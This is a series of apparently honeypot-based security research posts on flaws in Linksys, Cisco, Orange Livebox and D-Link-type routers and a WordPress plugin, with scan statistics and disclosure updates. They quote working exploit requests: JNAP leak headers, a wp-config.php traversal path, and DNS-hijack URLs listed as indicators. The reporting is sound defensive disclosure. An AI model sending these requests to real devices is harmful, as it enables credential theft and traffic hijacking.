Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw

Our honeypots frequently detect scans targeting various home automation protocol endpoints. Many of these attacks aim to exploit vulnerable consumer routers. Upon further investigation, we’ve discovered a persistent flaw affecting Linksys Smart Wi-Fi routers that allows unauthenticated remote access to sensitive information.

How can the vulnerability be exploited?

    1. Go to the Linksys Smart Wi-Fi router’s public IP address in your web browser
    2. Open the developer console (F12 key) and go to the Network tab
    3. Scroll down to JNAP (there’s multiple) and click to open it
Example vulnerable Linksys Smart Wi-Fi router
Example vulnerable Linksys Smart Wi-Fi EA7500 (AC1900) router

The leak can also be reproduced by sending a request to this JNAP endpoint:

X-JNAP-ACTION: http://cisco.com/jnap/devicelist/GetDevices

This sensitive information disclosure vulnerability requires no authentication and can be exploited by a remote attacker with little technical knowledge.

How many Linksys Smart Wi-Fi routers are vulnerable?

Using data provided by BinaryEdge, our scans have found 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public internet, including:

    • MAC address of every device that’s ever connected to it (full historical record, not just active devices)
    • Device name (such as “TROY-PC” or “Mat’s MacBook Pro”)
    • Operating system (such as “Windows 7” or “Android”)

In some cases additional metadata is logged such as device type, manufacturer, model number, and description – as seen in the example below.

Example metadata leaking by Linksys Smart Wi-Fi routers

Other sensitive information about the router such as the WAN settings, firewall status, firmware update settings, and DDNS settings are also leaked publicly.

What are the risks of leaking this information publicly?

A MAC address is a unique identifier for every networked device. Mobile devices, such as smartphones and laptops, share this identifier every time they connect to a wireless network. This creates a fingerprint that can be used to track that device’s movement across networks.

If a device’s name includes the full name of the owner, this flaw allows attackers to determine the identity of owner and geolocate them via the Linksys Smart Wi-Fi router’s public IP address.

While geolocation by IP address is not precise, services like WiGLE allow anyone to get the exact geographical coordinates of a WiFi network based solely on its MAC address or SSID. An attacker can query the target Linksys Smart Wi-Fi router, get it’s MAC address, and immediately geolocate it.

In any scenario, publicly leaking the historical record of every device that’s ever connected to the Linksys Smart Wi-Fi router is a privacy concern that shouldn’t be taken lightly. This information allows attackers to gain visibility inside your home or business network, enabling them to conduct targeted attacks.

Is there any connection to the ShadowHammer attacks?

Of the 756,565 unique MAC addresses currently being leaked, only two were referenced in the ShadowHammer attacks. However, it’s not likely either were targeted directly. The first match, 0c:5b:8f:27:9a:64, appears to be frequently reused by Huawei. The second was the VMware default (00:50:56:c0:00:08) and was targeted only if it paired with a secondary MAC address.

Did you find the German mail bomber?

The MAC address used by the German mail bomber (f8:e0:79:af:57:eb) was not found.

What is Home Network Administration Protocol (HNAP)?

HNAP is a SOAP-based protocol used to manage and configure consumer routers. Cisco acquired and took over development of the protocol in 2009. Numerous HNAP-related vulnerabilities have been identified in the last six years. Large-scale exploitation of HNAP flaws by “TheMoon” botnet was discovered by security researchers in 2014.

Are there other HNAP vulnerabilities?

Yes, an unauthenticated attacker can quickly enumerate which Linksys Smart Wi-Fi routers have not changed the default password (admin) without even attempting to login to the device. The can be done by simply querying the following JNAP endpoint:

X-JNAP-ACTION: http://cisco.com/jnap/core/IsAdminPasswordDefault

Our scans have found thousands of routers are still using the default password and are vulnerable to immediate takeover – if they aren’t already compromised.

Admin access to the Linksys Smart Wi-Fi router allows attackers to:

    • Obtain the SSID and Wi-Fi password in plaintext
    • Change the DNS settings to use a rogue DNS server to hijack web traffic
    • Open ports in the router’s firewall to directly target devices behind the routers (example: 3389/tcp for Windows RDP)
    • Use UPnP to redirect outgoing traffic to the threat actors’ device
    • Create an OpenVPN account (supported models) to route malicious traffic through the router
    • Disable the router’s internet connection or modify other settings in a destructive manner

What specific models of Linksys Smart Wi-Fi routers are vulnerable?

Our research has found the models listed below are actively leaking sensitive information, including those running the latest firmware available from Linksys.

Vulnerable Linksys Smart Wi-Fi router model numbers

The full list of vulnerable models and firmware versions is available here.

Where are the vulnerable routers located?

This interactive map shows the total vulnerable Linksys Smart Wi-Fi routers found per country.

Vulnerable Linksys Smart Wi-Fi routers by country
Of the vulnerable routers found, most were located in the United States.

Overall, a grand total of 25,617 vulnerable routers were found in 146 countries and on the network of 1,998 unique autonomous systems (internet service providers).

Wasn’t this issue patched five years ago?

While CVE-2014-8244 was supposedly patched for this issue, our findings have indicated otherwise. Upon contacting the Linksys security team (security@linksys.com) we were advised to report the vulnerability via this form. After submitting our findings, the reviewing analyst determined the issue was “Not applicable / Won’t fix” and subsequently closed.

Is there any good news?

Over half of the vulnerable Linksys Smart Wi-Fi routers (14,387) currently have automatic firmware updates enabled. If Linksys eventually patches this vulnerability, these routers will be protected automatically.

Closing remarks

Due to the sensitive nature of this vulnerability, the IP addresses of the affected Linksys Smart Wi-Fi routers will not be published publicly.

Unfortunately, our typical recommendation of keeping your router’s firmware up-to-date is not applicable in this case as no fix is available. Linksys Smart Wi-Fi routers have remote access enabled by default, as it’s required for the Linksys App to function, and cannot be turned off as a workaround. However, most (but not all) models have the option of using third-party firmware, such as OpenWrt, that can disable remote access and prevent the leak of sensitive information.

Follow us on Twitter for latest emerging threats and botnet trends.

Defunct WordPress plugin leaves nearly 400 websites vulnerable to sensitive information disclosure

On Saturday, April 13, 2019, our honeypots detected an exploit attempt targeting WordPress sites with a defunct plugin, CodeArt – Google MP3 Player, installed. This malicious activity originated from a host on the network of LeaseWeb (AS60781) and exploited a directory traversal flaw to retrieve the wp-config.php settings file. Our scans have indicated 391 WordPress sites are using the vulnerable plugin and are open to this type of attack.

The Exploit Attempt

wp-directory-traversal-attack-from-leaseweb
Attackers leveraged a directory traversal flaw to download the wp-config.php file.

The wp-config.php file contains sensitive information such as the WordPress database name, username, password and hostname.

wp-config-example
Example wp-config.php file

This file also contains the WordPress secret keys which can be used to forge authentication cookies. However, access to the WordPress database alone is enough for a threat actor to leverage further attacks to compromise the site. If the password used for the database is same as the admin user (credential reuse) it could be used to take over the targeted site via the front-end.

In short, there’s plenty of damage that can be incurred against a targeted site with the information contained in the wp-config.php file.

Vulnerable Sites Found

Using data provided by PublicWWW, we’ve scanned 964 WordPress sites currently using the “CodeArt – Google MP3 Player” plugin. Our scans found 391 sites are vulnerable.

The top three hosting providers of vulnerable sites are GoDaddy, Unified Layer, and OVH.

vulnerable-sites-by-hosting-provider

188 of the vulnerable sites found are hosted in the United States.

vulnerable-sites-by-country
Click here to view an interactive map of the results

IOCs

212.32.245.142
/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php

Closing remarks

Due to the sensitive nature of this vulnerability, the list of vulnerable websites will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with MS-ISAC and affected government organizations, such as the Government of Los Angeles County.

The “CodeArt – Google MP3 Player” WordPress plugin is no longer maintained by developers and was last updated six years ago. Anyone still using this plugin is advised to remove it immediately and change their WordPress database and user passwords.

Update 2019-04-18:

Our honeypots have detected additional directory traversal attacks against vulnerable WordPress sites, including those using the plugin described in this post.

Ongoing DNS hijacking campaign targeting consumer routers

Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers. All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.

First wave – December 29, 2018

The first DNS hijacking exploit attempts targeted multiple models of D-Link DSL modems, including:

The IP address of rogue DNS server used in this attack was 66.70.173.48 and hosted by OVH Canada.

Second wave – February 6, 2019

This wave targeted the same types of D-Link modems listed above. The rogue DNS server, 144.217.191.145, was again hosted by OVH Canada.

As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).

Third wave – March 26, 2019

The latest wave of attacks came from three distinct Google Cloud Platform hosts and targeted additional types of consumer routers not previously seen before including: ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.

DNS hijacking exploit attempts

The rogue DNS servers used in this round, 195.128.126.165 and 195.128.124.131, are both hosted in Russia by Inoventica Services. Internet access is provided by their subsidiary Garant-Park-Internet Ltd (AS47196).

Compromised D-Link DSL-2640 router with DNS servers set to rouge DNS server.
Example compromised D-Link DSL-2640B router with DNS servers set to rouge DNS servers used in this campaign.

In all three waves, a recon scan was done using Masscan to check for active hosts on port 81/tcp prior to attempting the DNS hijacking exploits.

How many targeted devices are vulnerable?

Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done, however we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge:

D-Link DSL-2640B – 14,327
D-Link DSL-2740R – 379
D-Link DSL-2780B – 0
D-Link DSL-526B – 7
ARG-W4 ADSL routers – 0
DSLink 260E routers – 7
Secutech routers – 17
TOTOLINK routers – 2,265

Why are DNS hijacking attacks conducted?

As we saw in years past with DNSChanger malware raking in $14 million, advertising-related fraud is still very lucrative for cybercriminals. Other researchers have noted domain parking remains a booming business often tied to illicit activities.

DNS hijacking is also used for phishing attacks which are largely transparent to users. In this case, the domain name of the targeted site is redirected by the rogue DNS server to a web server controlled by the threat actor. A recent DNS hijacking campaign targeting Brazilian banks was documented by Radware researchers.

Why was Google Cloud Platform used?

Being a large cloud service provider, dealing with abuse is an ongoing process for Google. However unlike their competitors, Google makes it very easy for a miscreants to abuse their platform.

Anyone with a Google account can access a “Google Cloud Shell” machine by simply visiting this URL. This service provides users with the equivalent of a Linux VPS with root privileges directly in a web browser. Due to the ephemeral nature of these virtual machines coupled with Google’s slow response time to abuse reports, it’s difficult to prevent this kind of malicious behavior.

IOCs

Exploit Attempt Source IPs
35.190.238.77
35.221.201.149
35.229.230.36
35.221.98.121
35.235.106.76
35.240.128.42
35.190.195.236

Rogue DNS Servers
66.70.173.48
144.217.191.145
195.128.126.165
195.128.124.131

Exploit Attempts
/action?dns_status=1&dns_poll_timeout=2&id=57&dns_server_ip_1=195&dns_server_ip_2=128&dns_server_ip_3=126&dns_server_ip_4=165&priority=1&cmdadd=add
/boafrm/formbasetcpipsetup?dnsmode=dnsmanual&dns1=195.128.126.165&dns2=195.128.124.131&dns3=195.128.124.131&dnsrefresh=1
/dnscfg.cgi?dnsPrimary=195.128.126.165&dnsSecondary=195.128.124.131&dnsDynamic=0&dnsRefresh=1
/form2dns.cgi?dnsmode=1&dns1=195.128.126.165&dns2=195.128.124.131&dns3=&submit.htm?dns.htm=send&save=apply
/wan_dns.asp?go=wan_dns.asp&reboottag=&dsen=1&dnsen=on&ds1=195.128.126.165&ds2=195.128.124.131
/dnscfg.cgi?dnsPrimary=144.217.191.145&dnsSecondary=144.217.191.145&dnsDynamic=0&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=66.70.173.48&dnsSecondary=66.70.173.48&dnsDynamic=0&dnsRefresh=1

Closing Remarks

In general, we recommend users to keep their home router firmware up-to-date. When security vulnerabilities are discovered, they are usually patched by the manufacturer to mitigate further attacks. It’s also advisable to review your router’s DNS settings to ensure they haven’t been tampered with. Typically your DNS servers should be set to the ones provided by your ISP or well-known public DNS resolvers.

As always, follow us on Twitter for latest emerging threats and botnet trends.

Update 2019-04-05:

Ixia researchers posted their findings on the DNS hijacking attacks originating from Google Cloud Platform. They found sites targeted for phishing included Netflix, PayPal, Uber, Gmail, and more.

They’ve also identified additional rogue DNS servers, again hosted by Inoventica Services in Russia:
195.128.124.150
195.128.124.181

A Google spokesperson provided the following statement to Ars Technica in regards to the abuse of Google Cloud Platform to conduct the DNS hijacking attacks:

Google response to abuse of their platform

Update 2019-04-23:

Our honeypots have detected a fourth wave of DNS hijacking attacks, again coming from a Google Cloud Platform host.

Update 2019-04-26:

Our honeypots have detected a fifth wave of DNS hijacking attacks, yet again originating from a Google Cloud Platform host.

Update 2019-04-28:

Our honeypots have detected a sixth wave of DNS hijacking exploit attempts, originating from a Google Cloud Platform host.

Update 2019-04-30:

Our honeypots have detected a seventh wave of DNS hijacking exploit attempts, originating from a Google Cloud Platform host.

Over 9,000 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653

On Friday, January 25, 2019, our honeypots detected opportunistic scanning activity from multiple hosts targeting Cisco Small Business RV320 and RV325 routers. A vulnerability exists in these routers that allow remote unauthenticated information disclosure (CVE-2019-1653) leading to remote code execution (CVE-2019-1652).

These scans consisted of a GET request for /cgi-bin/config.exp which is the path that allows unauthenticated remote users to obtain an entire dump of the device’s configuration settings. This includes the administrator credentials, however the password is hashed.

All configuration settings of the RV320/RV325 routers are exposed by this vulnerability.
All configuration settings of the RV320/RV325 routers are exposed by this vulnerability.

Using data provided by BinaryEdge, we’ve scanned  15,309 unique IPv4 hosts and determined 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.

  • 6,247 out of 9,852 Cisco RV320 routers scanned are vulnerable
    (1,650 are not vulnerable and 1,955 did not respond to our scans)
  • 3,410 out of 5,457 Cisco RV325 routers scanned are vulnerable
    (1,027 are not vulnerable and 1,020 did not respond to our scans)
Of the vulnerable routers found, most were located in the United States.
Of the vulnerable routers found, most were located in the United States.

This interactive map shows the total vulnerable hosts found per country. Overall, vulnerable devices were found in 122 countries and on the network of 1,619 unique internet service providers (autonomous systems).

These routers can be exploited further using the leaked credentials (CVE-2019-1652) resulting in remote code execution detailed in the proof-of-concept published by David Davidson (0x27).

These vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 1.4.2.15 and 1.4.2.17. Cisco has released a patch for these routers that should be applied immediately by anyone using outdated firmware. Changing the device’s admin and WiFi credentials is also highly recommended as they may already be compromised. Cisco has published an advisory providing further details here.

Closing remarks

Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation.

Additional updates

Update 2019-01-27:
We’ve shared our findings with CIRCL and SingCERT regarding vulnerable routers in Luxembourg and Singapore, respectively.

Update 2019-01-28:
We’ve shared our findings with ACSCCanadian Centre for Cyber Security, CCBCERT.atCLCERTNCSC and Z-CERT.

Update 2019-01-29:
We’ve shared our findings with ANSSI/COSSI/CERT-FRCSIRT-IE, CERT-PT, and SK-CERT.

Update 2019-01-30:
Cisco PSIRT confirmed receipt of our report of vulnerable Cisco RV320/RV325 routers. We’ve also shared our findings with INCIBE-CERT.

Our honeypots detected incoming scans from new unique hosts checking for vulnerable Cisco RV320/RV325 routers.

Update 2019-01-31:
US-CERT / CISA confirmed receipt of our report and advised their Technical Analysis Branch is reviewing.

Update 2019-02-01:
We’ve shared our findings with CERT Polska.

Our honeypots detected incoming scans from a new unique host checking for Cisco RV320/RV325 routers vulnerable to CVE-2019-1653.

Update 2019-03-27:

In a disclosure posted today, RedTeam Pentesting revealed the firmware update released by Cisco for affected RV320/RV325 routers was not properly corrected.

Patched devices may still be vulnerable to unauthorized information disclosure if the user agent used by the attacker is something other than curl.

Update 2019-03-28:

Our latest scan results indicate over 8,000 Cisco RV320/RV325 routers are still vulnerable to CVE-2019-1653.

Over 19,000 Orange Livebox ADSL modems are leaking their WiFi credentials

On Friday, December 21, 2018, our honeypots observed an interesting scan consisting of a GET request for /get_getnetworkconf.cgi. Upon further investigation, we found this traffic was targeting Orange Livebox ADSL modems. A flaw exists in these modems that allow remote unauthenticated users to obtain the device’s SSID and WiFi password.

curl request to an affected Orange Livebox ADSL modem
A simple GET request to “/get_getnetworkconf.cgi” will reveal the Orange Livebox modem’s WiFi credentials in plaintext.

To assess the amount of devices vulnerable to this flaw, we obtained a list of Orange Livebox modems from Shodan.

Of the 30,063 IPv4 hosts found, our scans revealed:

  • 19,490 leaking their WiFi credentials (SSID/password) in plaintext
  • 2,018 not leaking any information, but still exposed to the internet
  • 8,391 not responding to our scans

Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default “admin/admin” credentials are still applied.

Example Livebox modem status page
Poorly secured Livebox modems enable remote users to view the customer’s phone number, the name/MAC address of all connected clients, and more.

This allows allow any remote user to easily access the device and maliciously modify the device settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.

Unsurprisingly, the vast majority of affected devices were found to be on the network of Orange Espana (AS12479).

Total affected Livebox modems

Initial scan source

The initial scan for Orange Livebox modems came from 81.38.86.204

The initial scan detected by our honeypots came from 81.38.86.204 which is an IP address associated to a Telefonica Spain customer. While we can only guess what the motive was behind these scans, it’s interesting to find the source is physically closer to the affected Livebox ADSL modems than say a threat actor in another country. This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.

Closing remarks

Due to the sensitive nature of this flaw, the IP addresses of affected Orange Livebox ADSL modems will not be published publicly, however is freely available for law enforcement and CERT teams to review. We’ve shared our findings directly with Orange Espana, Orange-CERT, and CCN-CERT for further investigation and remediation.

Update 4:00 AM PT: Orange-CERT has acknowledged our report and is investigating further.

Update 6:00 PM PT: CVE-2018-20377 has been assigned for the flaw described in this post.

Update 2018-12-25: These Orange Livebox Arcadyan ARV7519 modem firmware versions appear to be patched against the “/get_getnetworkconf.cgi” flaw that leaks WiFi credentials:

  • 00.96.00.96.713D
  • 00.96.00.96.613E
  • 00.96.807
  • 00.96.322

These versions are not and are vulnerable to CVE-2018-20377:

  • 00.96.00.96.613
  • 00.96.00.96.609ES
  • 00.96.321S
  • 00.96.217

Update 2018-12-29: Nearly 15,000 Orange Livebox Arcadyan ARV7519 modems have been patched against CVE-2018-20377.